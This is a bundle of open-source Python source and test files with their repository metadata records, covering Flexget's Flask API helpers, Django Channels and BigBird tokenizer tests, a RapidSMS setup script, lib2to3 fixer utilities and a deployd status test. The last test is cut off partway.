responses={code_or_apierror.status_code: (description, code_or_apierror.response_model)}, **kwargs)
except TypeError:
# If first argument isn't a class this happens
pass
return self.doc(responses={code_or_apierror: (description, model)}, **kwargs)
def pagination_parser(self, parser=None, sort_choices=None, default=None, add_sort=None):
"""
Return a standardized pagination parser, to be used for any endpoint that has pagination.
:param RequestParser parser: Can extend a given parser or create a new one
:param tuple sort_choices: A tuple of strings, to be used as server side attribute searches
        :param str default: The default sort string; `sort_choices[0]` is used if not given
:param bool add_sort: Add sort order choices without adding specific sort choices
:return: An api.parser() instance with pagination and sorting arguments.
"""
pagination = parser.copy() if parser else self.parser()
pagination.add_argument('page', type=int, default=1, help='Page number')
pagination.add_argument('per_page', type=int, default=50, help='Results per page')
if sort_choices or add_sort:
pagination.add_argument('order', choices=('desc', 'asc'), default='desc', help='Sorting order')
if sort_choices:
pagination.add_argument('sort_by', choices=sort_choices, default=default or sort_choices[0],
help='Sort by attribute')
return pagination
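    # Illustrative use (the sort choices are placeholders):
    #
    #     parser = api.pagination_parser(sort_choices=('added', 'title'))
    #     args = parser.parse_args()  # yields page, per_page, order, sort_by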
api_app = Flask(__name__, template_folder=os.path.join(__path__[0], 'templates'))
api_app.config['REMEMBER_COOKIE_NAME'] = 'flexget.token'
api_app.config['DEBUG'] = True
api_app.config['ERROR_404_HELP'] = False
api_app.url_map.strict_slashes = False
CORS(api_app, expose_headers='Link, Total-Count, Count, ETag')
Compress(api_app)
api = API(
api_app,
title='Flexget API v{}'.format(__version__),
version=__version__,
description='View and manage flexget core operations and plugins. Open each endpoint view for usage information.'
' Navigate to http://flexget.com/API for more details.',
format_checker=format_checker
)
base_message = {
'type': 'object',
'properties': {
'status_code': {'type': 'integer'},
'message': {'type': 'string'},
'status': {'type': 'string'}
},
'required': ['status_code', 'message', 'status']
}
base_message_schema = api.schema_model('base_message', base_message)
class APIError(Exception):
description = 'Server error'
status_code = 500
status = 'Error'
response_model = base_message_schema
def __init__(self, message=None, payload=None):
self.message = message
self.payload = payload
def to_dict(self):
rv = self.payload or {}
rv.update(status_code=self.status_code, message=self.message, status=self.status)
return rv
@classmethod
def schema(cls):
return cls.response_model.__schema__
class NotFoundError(APIError):
status_code = 404
description = 'Not found'
class Unauthorized(APIError):
status_code = 401
description = 'Unauthorized'
class BadRequest(APIError):
status_code = 400
description = 'Bad request'
class Conflict(APIError):
status_code = 409
description = 'Conflict'
class PreconditionFailed(APIError):
status_code = 412
description = 'Precondition failed'
class NotModified(APIError):
status_code = 304
description = 'not modified'
class ValidationError(APIError):
status_code = 422
description = 'Validation error'
response_model = api.schema_model('validation_error', {
'type': 'object',
'properties': {
'validation_errors': {
'type': 'array',
'items': {
'type': 'object',
'properties': {
'message': {'type': 'string', 'description': 'A human readable message explaining the error.'},
'validator': {'type': 'string', 'description': 'The name of the failed validator.'},
'validator_value': {
'type': 'string', 'description': 'The value for the failed validator in the schema.'
},
'path': {'type': 'string'},
'schema_path': {'type': 'string'},
}
}
}
},
'required': ['validation_errors']
})
verror_attrs = (
'message', 'cause', 'validator', 'validator_value',
'path', 'schema_path', 'parent'
)
def __init__(self, validation_errors, message='validation error'):
payload = {'validation_errors': [self._verror_to_dict(error) for error in validation_errors]}
super(ValidationError, self).__init__(message, payload=payload)
def _verror_to_dict(self, error):
error_dict = {}
for attr in self.verror_attrs:
if isinstance(getattr(error, attr), deque):
error_dict[attr] = list(getattr(error, attr))
else:
error_dict[attr] = str(getattr(error, attr))
return error_dict
empty_response = api.schema_model('empty', {'type': 'object'})
def success_response(message, status_code=200, status='success'):
rsp_dict = {
'message': message,
'status_code': status_code,
'status': status
}
rsp = jsonify(rsp_dict)
rsp.status_code = status_code
return rsp
@api.errorhandler(APIError)
@api.errorhandler(NotFoundError)
@api.errorhandler(ValidationError)
@api.errorhandler(BadRequest)
@api.errorhandler(Unauthorized)
@api.errorhandler(Conflict)
@api.errorhandler(NotModified)
@api.errorhandler(PreconditionFailed)
def api_errors(error):
return error.to_dict(), error.status_code
@with_session
def api_key(session=None):
log.debug('fetching token for internal lookup')
return session.query(User).first().token
def etag(f):
"""
    A decorator that adds an ETag header to the response and checks the "If-Match" and "If-None-Match" headers in order to
return an appropriate response.
:param f: A GET or HEAD flask method to wrap
:return: The method's response with the ETag and Cache-Control headers, raises a 412 error or returns a 304 response
"""
@wraps(f)
def wrapped(*args, **kwargs):
# Identify if this is a GET or HEAD in order to proceed
        assert request.method in ['HEAD', 'GET'], '@etag is only supported for GET and HEAD requests'
rv = f(*args, **kwargs)
rv = make_response(rv)
# Some headers can change without data change for specific page
content_headers = rv.headers.get('link', '') + rv.headers.get('count', '') + rv.headers.get('total-count', '')
data = (rv.get_data().decode() + content_headers).encode()
etag = generate_etag(data)
rv.headers['Cache-Control'] = 'max-age=86400'
rv.headers['ETag'] = etag
if_match = request.headers.get('If-Match')
if_none_match = request.headers.get('If-None-Match')
if if_match:
etag_list = [tag.strip() for tag in if_match.split(',')]
if etag not in etag_list and '*' not in etag_list:
raise PreconditionFailed('etag does not match')
elif if_none_match:
etag_list = [tag.strip() for tag in if_none_match.split(',')]
if etag in etag_list or '*' in etag_list:
raise NotModified
return rv
return wrapped
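# Illustrative use of the decorator above (the resource and payload are
# placeholders, not endpoints defined in this module):
#
#     class VersionAPI(APIResource):
#         @etag
#         def get(self, session=None):
#             return jsonify({'api_version': __version__})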
def pagination_headers(total_pages, total_items, page_count, request):
"""
    Creates the 'Link', 'Count' and 'Total-Count' headers, to be used for pagination traversal
:param total_pages: Total number of pages
:param total_items: Total number of items in all the pages
:param page_count: Item count for page (may differ from page size request)
    :param request: The flask request used; required to build recurring values such as the URL and query string.
:return:
"""
# Build constant variables from request data
url = request.url_root + request.path.lstrip('/')
per_page = request.args.get('per_page', 50)
page = int(request.args.get('page', 1))
# Build the base template
LINKTEMPLATE = '<{}?per_page={}&'.format(url, per_page)
    # Remove page and per_page from the query string
    query_string = re.sub(br'per_page=\d+', b'', request.query_string)
    query_string = re.sub(br'page=\d+', b'', query_string)
    query_string = re.sub(br'&{2,}', b'&', query_string)
# Add all original query params
LINKTEMPLATE += query_string.decode().lstrip('&') + '&page={}>; rel="{}"'
link_string = ''
if page > 1:
link_string += LINKTEMPLATE.format(page - 1, 'prev') + ', '
if page < total_pages:
link_string += LINKTEMPLATE.format(page + 1, 'next') + ', '
link_string += LINKTEMPLATE.format(total_pages, 'last')
return {
'Link': link_string,
'Total-Count': total_items,
'Count': page_count
}
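# For example, for page=2 of 5 total pages, the dict returned above carries a
# Link header with rel="prev", rel="next" and rel="last" URIs plus the
# Total-Count and per-page Count values (exact URI formatting depends on the
# incoming request's path and query string).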
|
{
"content_hash": "507b75ec0a85653664f3bf1d2ae8bb77",
"timestamp": "",
"source": "github",
"line_count": 398,
"max_line_length": 120,
"avg_line_length": 33.96733668341709,
"alnum_prop": 0.6225312523115615,
"repo_name": "OmgOhnoes/Flexget",
"id": "320db5b12b04ec8ddd6b676f2109514da9bdced0",
"size": "13519",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "flexget/api/app.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "11875"
},
{
"name": "HTML",
"bytes": "79376"
},
{
"name": "JavaScript",
"bytes": "263723"
},
{
"name": "Python",
"bytes": "3324701"
},
{
"name": "SRecode Template",
"bytes": "3"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.http.cookie import parse_cookie
from channels.test import ChannelTestCase, HttpClient
class HttpClientTests(ChannelTestCase):
def test_cookies(self):
client = HttpClient()
client.set_cookie('foo', 'not-bar')
client.set_cookie('foo', 'bar')
client.set_cookie('qux', 'qu;x')
# Django's interpretation of the serialized cookie.
cookie_dict = parse_cookie(client.headers['cookie'].decode('ascii'))
self.assertEqual(client.get_cookies(),
cookie_dict)
self.assertEqual({'foo': 'bar',
'qux': 'qu;x',
'sessionid': client.get_cookies()['sessionid']},
cookie_dict)
|
{
"content_hash": "068e7adca132dace10e7385d3f9b2829",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 76,
"avg_line_length": 32.666666666666664,
"alnum_prop": 0.5803571428571429,
"repo_name": "Coread/channels",
"id": "0ec9089dd9af306ca8789ad30f5c5e7f2702ab5b",
"size": "784",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_http.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "29400"
},
{
"name": "Makefile",
"bytes": "424"
},
{
"name": "Python",
"bytes": "232339"
}
],
"symlink_target": ""
}
|
import os
from setuptools import setup, find_packages
def read_file(filename):
"""Read a file into a string"""
path = os.path.abspath(os.path.dirname(__file__))
filepath = os.path.join(path, filename)
with open(filepath) as f:
        return f.read()
setup(
name="RapidSMS",
version=__import__('rapidsms').__version__,
license="BSD",
install_requires=[
"requests>=1.2.0",
"django-tables2==1.0.*",
"djappsettings>=0.4.0",
"django-selectable>=0.7.0",
],
packages=find_packages(),
include_package_data=True,
exclude_package_data={
'': ['*.pyc']
},
author="RapidSMS development community",
author_email="rapidsms@googlegroups.com",
maintainer="RapidSMS development community",
maintainer_email="rapidsms@googlegroups.com",
description="Build SMS applications with Python and Django",
long_description=read_file('README.rst'),
url="http://github.com/rapidsms/rapidsms",
test_suite="run_tests.main",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Framework :: Django',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
)
|
{
"content_hash": "c61343ad2acb35595e491848b5cdc38e",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 64,
"avg_line_length": 28.796296296296298,
"alnum_prop": 0.6051446945337621,
"repo_name": "catalpainternational/rapidsms",
"id": "0f6a0355645b5edcfe7df272c17a51fcb64113e5",
"size": "1555",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "8143"
},
{
"name": "HTML",
"bytes": "27797"
},
{
"name": "JavaScript",
"bytes": "7020"
},
{
"name": "Python",
"bytes": "305443"
},
{
"name": "Shell",
"bytes": "149"
}
],
"symlink_target": ""
}
|
"""Utility functions, node construction macros, etc."""
# Author: Collin Winter
# Local imports
from .pgen2 import token
from .pytree import Leaf, Node
from .pygram import python_symbols as syms
from . import patcomp
try:
unicode
except NameError:
unicode = str
###########################################################
### Common node-construction "macros"
###########################################################
def KeywordArg(keyword, value):
return Node(syms.argument,
[keyword, Leaf(token.EQUAL, u"="), value])
def LParen():
return Leaf(token.LPAR, u"(")
def RParen():
return Leaf(token.RPAR, u")")
def Assign(target, source):
"""Build an assignment statement"""
if not isinstance(target, list):
target = [target]
if not isinstance(source, list):
source.prefix = u" "
source = [source]
return Node(syms.atom,
target + [Leaf(token.EQUAL, u"=", prefix=u" ")] + source)
def Name(name, prefix=None):
"""Return a NAME leaf"""
return Leaf(token.NAME, name, prefix=prefix)
def Attr(obj, attr):
"""A node tuple for obj.attr"""
return [obj, Node(syms.trailer, [Dot(), attr])]
def Comma():
"""A comma leaf"""
return Leaf(token.COMMA, u",")
def Dot():
"""A period (.) leaf"""
return Leaf(token.DOT, u".")
def ArgList(args, lparen=LParen(), rparen=RParen()):
"""A parenthesised argument list, used by Call()"""
node = Node(syms.trailer, [lparen.clone(), rparen.clone()])
if args:
node.insert_child(1, Node(syms.arglist, args))
return node
def Call(func_name, args=None, prefix=None):
"""A function call"""
node = Node(syms.power, [func_name, ArgList(args)])
if prefix is not None:
node.prefix = prefix
return node
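# For example, Call(Name(u"sorted"), [Name(u"items")]) builds a tree that
# renders as "sorted(items)".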
def Newline():
"""A newline literal"""
return Leaf(token.NEWLINE, u"\n")
def BlankLine():
"""A blank line"""
return Leaf(token.NEWLINE, u"")
def Number(n, prefix=None):
return Leaf(token.NUMBER, n, prefix=prefix)
def Subscript(index_node):
"""A numeric or string subscript"""
return Node(syms.trailer, [Leaf(token.LBRACE, u"["),
index_node,
Leaf(token.RBRACE, u"]")])
def String(string, prefix=None):
"""A string leaf"""
return Leaf(token.STRING, string, prefix=prefix)
def ListComp(xp, fp, it, test=None):
"""A list comprehension of the form [xp for fp in it if test].
If test is None, the "if test" part is omitted.
"""
xp.prefix = u""
fp.prefix = u" "
it.prefix = u" "
for_leaf = Leaf(token.NAME, u"for")
for_leaf.prefix = u" "
in_leaf = Leaf(token.NAME, u"in")
in_leaf.prefix = u" "
inner_args = [for_leaf, fp, in_leaf, it]
if test:
test.prefix = u" "
if_leaf = Leaf(token.NAME, u"if")
if_leaf.prefix = u" "
inner_args.append(Node(syms.comp_if, [if_leaf, test]))
inner = Node(syms.listmaker, [xp, Node(syms.comp_for, inner_args)])
return Node(syms.atom,
[Leaf(token.LBRACE, u"["),
inner,
Leaf(token.RBRACE, u"]")])
def FromImport(package_name, name_leafs):
""" Return an import statement in the form:
from package import name_leafs"""
# XXX: May not handle dotted imports properly (eg, package_name='foo.bar')
#assert package_name == '.' or '.' not in package_name, "FromImport has "\
# "not been tested with dotted package names -- use at your own "\
# "peril!"
for leaf in name_leafs:
# Pull the leaves out of their old tree
leaf.remove()
children = [Leaf(token.NAME, u"from"),
Leaf(token.NAME, package_name, prefix=u" "),
Leaf(token.NAME, u"import", prefix=u" "),
Node(syms.import_as_names, name_leafs)]
imp = Node(syms.import_from, children)
return imp
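# For example, FromImport(u"collections", [Name(u"deque", prefix=u" ")])
# renders as "from collections import deque".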
###########################################################
### Determine whether a node represents a given literal
###########################################################
def is_tuple(node):
"""Does the node represent a tuple literal?"""
if isinstance(node, Node) and node.children == [LParen(), RParen()]:
return True
return (isinstance(node, Node)
and len(node.children) == 3
and isinstance(node.children[0], Leaf)
and isinstance(node.children[1], Node)
and isinstance(node.children[2], Leaf)
and node.children[0].value == u"("
and node.children[2].value == u")")
def is_list(node):
"""Does the node represent a list literal?"""
return (isinstance(node, Node)
and len(node.children) > 1
and isinstance(node.children[0], Leaf)
and isinstance(node.children[-1], Leaf)
and node.children[0].value == u"["
and node.children[-1].value == u"]")
###########################################################
### Misc
###########################################################
def parenthesize(node):
return Node(syms.atom, [LParen(), node, RParen()])
consuming_calls = set(["sorted", "list", "set", "any", "all", "tuple", "sum",
"min", "max"])
def attr_chain(obj, attr):
"""Follow an attribute chain.
    If you have a chain of objects where a.foo -> b, b.foo -> c, etc.,
    use this to iterate over all objects in the chain. Iteration is
    terminated when getattr(x, attr) is None.
Args:
obj: the starting object
attr: the name of the chaining attribute
Yields:
Each successive object in the chain.
"""
next = getattr(obj, attr)
while next:
yield next
next = getattr(next, attr)
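# For example, attr_chain(node, "parent") yields node.parent, then
# node.parent.parent, and so on, stopping once the attribute is None.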
p0 = """for_stmt< 'for' any 'in' node=any ':' any* >
| comp_for< 'for' any 'in' node=any any* >
"""
p1 = """
power<
( 'iter' | 'list' | 'tuple' | 'sorted' | 'set' | 'sum' |
'any' | 'all' | 'enumerate' | (any* trailer< '.' 'join' >) )
trailer< '(' node=any ')' >
any*
>
"""
p2 = """
power<
'sorted'
trailer< '(' arglist<node=any any*> ')' >
any*
>
"""
pats_built = False
def in_special_context(node):
""" Returns true if node is in an environment where all that is required
        of it is being iterable (i.e. it doesn't matter if it returns a list
        or an iterator).
See test_map_nochange in test_fixers.py for some examples and tests.
"""
global p0, p1, p2, pats_built
if not pats_built:
p1 = patcomp.compile_pattern(p1)
p0 = patcomp.compile_pattern(p0)
p2 = patcomp.compile_pattern(p2)
pats_built = True
patterns = [p0, p1, p2]
for pattern, parent in zip(patterns, attr_chain(node, "parent")):
results = {}
if pattern.match(parent, results) and results["node"] is node:
return True
return False
def is_probably_builtin(node):
"""
Check that something isn't an attribute or function name etc.
"""
prev = node.prev_sibling
if prev is not None and prev.type == token.DOT:
# Attribute lookup.
return False
parent = node.parent
if parent.type in (syms.funcdef, syms.classdef):
return False
if parent.type == syms.expr_stmt and parent.children[0] is node:
# Assignment.
return False
if parent.type == syms.parameters or \
(parent.type == syms.typedargslist and (
(prev is not None and prev.type == token.COMMA) or
parent.children[0] is node
)):
# The name of an argument.
return False
return True
def find_indentation(node):
"""Find the indentation of *node*."""
while node is not None:
if node.type == syms.suite and len(node.children) > 2:
indent = node.children[1]
if indent.type == token.INDENT:
return indent.value
node = node.parent
return u""
###########################################################
### The following functions are to find bindings in a suite
###########################################################
def make_suite(node):
if node.type == syms.suite:
return node
node = node.clone()
parent, node.parent = node.parent, None
suite = Node(syms.suite, [node])
suite.parent = parent
return suite
def find_root(node):
"""Find the top level namespace."""
# Scamper up to the top level namespace
while node.type != syms.file_input:
assert node.parent, "Tree is insane! root found before "\
"file_input node was found."
node = node.parent
return node
def does_tree_import(package, name, node):
""" Returns true if name is imported from package at the
top level of the tree which node belongs to.
To cover the case of an import like 'import foo', use
None for the package and 'foo' for the name. """
binding = find_binding(name, find_root(node), package)
return bool(binding)
def is_import(node):
"""Returns true if the node is an import statement."""
return node.type in (syms.import_name, syms.import_from)
def touch_import(package, name, node):
""" Works like `does_tree_import` but adds an import statement
if it was not imported. """
def is_import_stmt(node):
return (node.type == syms.simple_stmt and node.children and
is_import(node.children[0]))
root = find_root(node)
if does_tree_import(package, name, root):
return
# figure out where to insert the new import. First try to find
# the first import and then skip to the last one.
insert_pos = offset = 0
for idx, node in enumerate(root.children):
if not is_import_stmt(node):
continue
for offset, node2 in enumerate(root.children[idx:]):
if not is_import_stmt(node2):
break
insert_pos = idx + offset
break
# if there are no imports where we can insert, find the docstring.
# if that also fails, we stick to the beginning of the file
if insert_pos == 0:
for idx, node in enumerate(root.children):
if (node.type == syms.simple_stmt and node.children and
node.children[0].type == token.STRING):
insert_pos = idx + 1
break
if package is None:
import_ = Node(syms.import_name, [
Leaf(token.NAME, u"import"),
Leaf(token.NAME, name, prefix=u" ")
])
else:
import_ = FromImport(package, [Leaf(token.NAME, name, prefix=u" ")])
children = [import_, Newline()]
root.insert_child(insert_pos, Node(syms.simple_stmt, children))
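# Illustrative sketch (not in the original module): for a tree parsed from
# "import os\nx = 1\n", touch_import(None, u"sys", node) rewrites it to
# "import os\nimport sys\nx = 1\n", while touch_import(u"collections",
# u"deque", node) inserts "from collections import deque". A second call
# with the same arguments is a no-op, since does_tree_import() then finds
# the existing binding.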
_def_syms = set([syms.classdef, syms.funcdef])
def find_binding(name, node, package=None):
""" Returns the node which binds variable name, otherwise None.
If optional argument package is supplied, only imports will
be returned.
See test cases for examples."""
for child in node.children:
ret = None
if child.type == syms.for_stmt:
if _find(name, child.children[1]):
return child
n = find_binding(name, make_suite(child.children[-1]), package)
if n: ret = n
elif child.type in (syms.if_stmt, syms.while_stmt):
n = find_binding(name, make_suite(child.children[-1]), package)
if n: ret = n
elif child.type == syms.try_stmt:
n = find_binding(name, make_suite(child.children[2]), package)
if n:
ret = n
else:
for i, kid in enumerate(child.children[3:]):
if kid.type == token.COLON and kid.value == ":":
# i+3 is the colon, i+4 is the suite
n = find_binding(name, make_suite(child.children[i+4]), package)
if n: ret = n
elif child.type in _def_syms and child.children[1].value == name:
ret = child
elif _is_import_binding(child, name, package):
ret = child
elif child.type == syms.simple_stmt:
ret = find_binding(name, child, package)
elif child.type == syms.expr_stmt:
if _find(name, child.children[0]):
ret = child
if ret:
if not package:
return ret
if is_import(ret):
return ret
return None
_block_syms = set([syms.funcdef, syms.classdef, syms.trailer])
def _find(name, node):
nodes = [node]
while nodes:
node = nodes.pop()
if node.type > 256 and node.type not in _block_syms:
nodes.extend(node.children)
elif node.type == token.NAME and node.value == name:
return node
return None
def _is_import_binding(node, name, package=None):
""" Will reuturn node if node will import name, or node
will import * from package. None is returned otherwise.
See test cases for examples. """
if node.type == syms.import_name and not package:
imp = node.children[1]
if imp.type == syms.dotted_as_names:
for child in imp.children:
if child.type == syms.dotted_as_name:
if child.children[2].value == name:
return node
elif child.type == token.NAME and child.value == name:
return node
elif imp.type == syms.dotted_as_name:
last = imp.children[-1]
if last.type == token.NAME and last.value == name:
return node
elif imp.type == token.NAME and imp.value == name:
return node
elif node.type == syms.import_from:
# unicode(...) is used to make life easier here, because
# from a.b import parses to ['import', ['a', '.', 'b'], ...]
if package and unicode(node.children[1]).strip() != package:
return None
n = node.children[3]
if package and _find(u"as", n):
# See test_from_import_as for explanation
return None
elif n.type == syms.import_as_names and _find(name, n):
return node
elif n.type == syms.import_as_name:
child = n.children[2]
if child.type == token.NAME and child.value == name:
return node
elif n.type == token.NAME and n.value == name:
return node
elif package and n.type == token.STAR:
return node
return None
|
{
"content_hash": "3f310ddf39bce1ccb457b4359d333ef5",
"timestamp": "",
"source": "github",
"line_count": 437,
"max_line_length": 88,
"avg_line_length": 33.45080091533181,
"alnum_prop": 0.5580106717745246,
"repo_name": "liamcurry/py3kwarn",
"id": "e16cdb668913661a7dba9c203844fd11ea6f8c4c",
"size": "14618",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "py3kwarn2to3/fixer_util.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "632424"
}
],
"symlink_target": ""
}
|
import os
import unittest
from transformers import BigBirdTokenizer, BigBirdTokenizerFast
from transformers.file_utils import cached_property
from transformers.testing_utils import require_sentencepiece, require_tokenizers, require_torch, slow
from .test_tokenization_common import TokenizerTesterMixin
SPIECE_UNDERLINE = "▁"
SAMPLE_VOCAB = os.path.join(os.path.dirname(os.path.abspath(__file__)), "fixtures/test_sentencepiece.model")
@require_sentencepiece
@require_tokenizers
class BigBirdTokenizationTest(TokenizerTesterMixin, unittest.TestCase):
tokenizer_class = BigBirdTokenizer
rust_tokenizer_class = BigBirdTokenizerFast
test_rust_tokenizer = True
test_sentencepiece = True
def setUp(self):
super().setUp()
tokenizer = self.tokenizer_class(SAMPLE_VOCAB, keep_accents=True)
tokenizer.save_pretrained(self.tmpdirname)
def test_rust_and_python_full_tokenizers(self):
if not self.test_rust_tokenizer:
return
tokenizer = self.get_tokenizer()
rust_tokenizer = self.get_rust_tokenizer()
sequence = "I was born in 92000, and this is falsé."
tokens = tokenizer.tokenize(sequence)
rust_tokens = rust_tokenizer.tokenize(sequence)
self.assertListEqual(tokens, rust_tokens)
ids = tokenizer.encode(sequence, add_special_tokens=False)
rust_ids = rust_tokenizer.encode(sequence, add_special_tokens=False)
self.assertListEqual(ids, rust_ids)
rust_tokenizer = self.get_rust_tokenizer()
ids = tokenizer.encode(sequence)
rust_ids = rust_tokenizer.encode(sequence)
self.assertListEqual(ids, rust_ids)
def test_full_tokenizer(self):
tokenizer = BigBirdTokenizer(SAMPLE_VOCAB, keep_accents=True)
tokens = tokenizer.tokenize("This is a test")
self.assertListEqual(tokens, ["▁This", "▁is", "▁a", "▁t", "est"])
self.assertListEqual(
tokenizer.convert_tokens_to_ids(tokens),
[285, 46, 10, 170, 382],
)
tokens = tokenizer.tokenize("I was born in 92000, and this is falsé.")
self.assertListEqual(
tokens,
[
SPIECE_UNDERLINE + "I",
SPIECE_UNDERLINE + "was",
SPIECE_UNDERLINE + "b",
"or",
"n",
SPIECE_UNDERLINE + "in",
SPIECE_UNDERLINE + "",
"9",
"2",
"0",
"0",
"0",
",",
SPIECE_UNDERLINE + "and",
SPIECE_UNDERLINE + "this",
SPIECE_UNDERLINE + "is",
SPIECE_UNDERLINE + "f",
"al",
"s",
"é",
".",
],
)
ids = tokenizer.convert_tokens_to_ids(tokens)
self.assertListEqual(
ids,
[8, 21, 84, 55, 24, 19, 7, 0, 602, 347, 347, 347, 3, 12, 66, 46, 72, 80, 6, 0, 4],
)
back_tokens = tokenizer.convert_ids_to_tokens(ids)
self.assertListEqual(
back_tokens,
[
SPIECE_UNDERLINE + "I",
SPIECE_UNDERLINE + "was",
SPIECE_UNDERLINE + "b",
"or",
"n",
SPIECE_UNDERLINE + "in",
SPIECE_UNDERLINE + "",
"<unk>",
"2",
"0",
"0",
"0",
",",
SPIECE_UNDERLINE + "and",
SPIECE_UNDERLINE + "this",
SPIECE_UNDERLINE + "is",
SPIECE_UNDERLINE + "f",
"al",
"s",
"<unk>",
".",
],
)
@cached_property
def big_tokenizer(self):
return BigBirdTokenizer.from_pretrained("google/bigbird-roberta-base")
@slow
def test_tokenization_base_easy_symbols(self):
symbols = "Hello World!"
original_tokenizer_encodings = [65, 18536, 2260, 101, 66]
self.assertListEqual(original_tokenizer_encodings, self.big_tokenizer.encode(symbols))
@slow
def test_tokenization_base_hard_symbols(self):
symbols = 'This is a very long text with a lot of weird characters, such as: . , ~ ? ( ) " [ ] ! : - . Also we will add words that should not exsist and be tokenized to <unk>, such as saoneuhaoesuth'
# fmt: off
original_tokenizer_encodings = [65, 871, 419, 358, 946, 991, 2521, 452, 358, 1357, 387, 7751, 3536, 112, 985, 456, 126, 865, 938, 5400, 5734, 458, 1368, 467, 786, 2462, 5246, 1159, 633, 865, 4519, 457, 582, 852, 2557, 427, 916, 508, 405, 34324, 497, 391, 408, 11342, 1244, 385, 100, 938, 985, 456, 574, 362, 12597, 3200, 3129, 1172, 66] # noqa: E231
# fmt: on
self.assertListEqual(original_tokenizer_encodings, self.big_tokenizer.encode(symbols))
@require_torch
@slow
def test_torch_encode_plus_sent_to_model(self):
import torch
from transformers import BigBirdConfig, BigBirdModel
# Build sequence
first_ten_tokens = list(self.big_tokenizer.get_vocab().keys())[:10]
sequence = " ".join(first_ten_tokens)
encoded_sequence = self.big_tokenizer.encode_plus(sequence, return_tensors="pt", return_token_type_ids=False)
batch_encoded_sequence = self.big_tokenizer.batch_encode_plus(
[sequence + " " + sequence], return_tensors="pt", return_token_type_ids=False
)
config = BigBirdConfig(attention_type="original_full")
model = BigBirdModel(config)
assert model.get_input_embeddings().weight.shape[0] >= self.big_tokenizer.vocab_size
with torch.no_grad():
model(**encoded_sequence)
model(**batch_encoded_sequence)
@slow
def test_special_tokens(self):
"""
To reproduce:
$ wget https://github.com/google-research/bigbird/blob/master/bigbird/vocab/gpt2.model?raw=true
$ mv gpt2.model?raw=true gpt2.model
```
import tensorflow_text as tft
import tensorflow as tf
vocab_model_file = "./gpt2.model"
tokenizer = tft.SentencepieceTokenizer(model=tf.io.gfile.GFile(vocab_model_file, "rb").read())
ids = tokenizer.tokenize("Paris is the [MASK].")
ids = tf.concat([tf.constant([65]), ids, tf.constant([66])], axis=0)
detokenized = tokenizer.detokenize(ids) # should give [CLS] Paris is the [MASK].[SEP]
"""
tokenizer = BigBirdTokenizer.from_pretrained("google/bigbird-roberta-base")
decoded_text = tokenizer.decode(tokenizer("Paris is the [MASK].").input_ids)
self.assertEqual(decoded_text, "[CLS] Paris is the [MASK].[SEP]")
|
{
"content_hash": "b53715f4dc6d5ab67df81579cbd15014",
"timestamp": "",
"source": "github",
"line_count": 189,
"max_line_length": 358,
"avg_line_length": 36.116402116402114,
"alnum_prop": 0.5736888368004688,
"repo_name": "huggingface/pytorch-transformers",
"id": "c4d700cad6bd68fe64f83ff0c70e433c1cd406a0",
"size": "7461",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_tokenization_big_bird.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "194"
},
{
"name": "Jupyter Notebook",
"bytes": "535623"
},
{
"name": "Python",
"bytes": "897445"
}
],
"symlink_target": ""
}
|
from django.conf import settings
|
{
"content_hash": "e060bb020a0b0d1fc2fbe39995eb6505",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 32,
"avg_line_length": 33,
"alnum_prop": 0.8484848484848485,
"repo_name": "yunojuno/django-sample-app",
"id": "7ad28dc4f2f6e42e6bab867dea1075c17ec83dfa",
"size": "75",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "my_app/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "4354"
}
],
"symlink_target": ""
}
|
import os
import tempfile
import unittest
import tests
from deployd.common.types import DeployStatus, BuildInfo, DeployStage, AgentStatus
from deployd.common.env_status import EnvStatus
from deployd.types.ping_report import PingReport
class TestStatusFunction(tests.TestCase):
def test_load_dump_file(self):
fn = tempfile.mkstemp()[1]
env_status = EnvStatus(fn)
status1 = DeployStatus()
ping_report = {}
ping_report['deployId'] = 'deploy1'
ping_report['envId'] = 'envId1'
ping_report['envName'] = 'env1'
ping_report['stageName'] = 'beta'
ping_report['deployStage'] = DeployStage.POST_RESTART
ping_report['status'] = AgentStatus.AGENT_FAILED
ping_report['errorCode'] = 1
ping_report['errorMessage'] = 'Fail to open files'
status1.report = PingReport(jsonValue=ping_report)
status1.build_info = BuildInfo(commit='abc', build_url='http://google.com', build_id='234')
status2 = DeployStatus()
ping_report = {}
ping_report['deployId'] = 'deploy2'
ping_report['envId'] = 'envId2'
ping_report['envName'] = 'env2'
ping_report['stageName'] = 'prod'
ping_report['deployStage'] = DeployStage.SERVING_BUILD
ping_report['status'] = AgentStatus.SUCCEEDED
status2.report = PingReport(jsonValue=ping_report)
status2.build_info = BuildInfo(commit='bcd', build_url='http://pinterest.com',
build_id='234')
envs = {
'env1': status1,
'env2': status2}
env_status.dump_envs(envs)
envs2 = env_status.load_envs()
self.assertEqual(envs['env1'].report.status, envs2['env1'].report.status)
self.assertEqual(envs['env1'].report.errorMessage, envs2['env1'].report.errorMessage)
self.assertEqual(envs['env1'].build_info.build_commit,
envs2['env1'].build_info.build_commit)
self.assertEqual(envs['env2'].report.deployStage, envs2['env2'].report.deployStage)
self.assertEqual(envs['env2'].build_info.build_url, envs2['env2'].build_info.build_url)
os.remove(fn)
def test_load_non_exist_file(self):
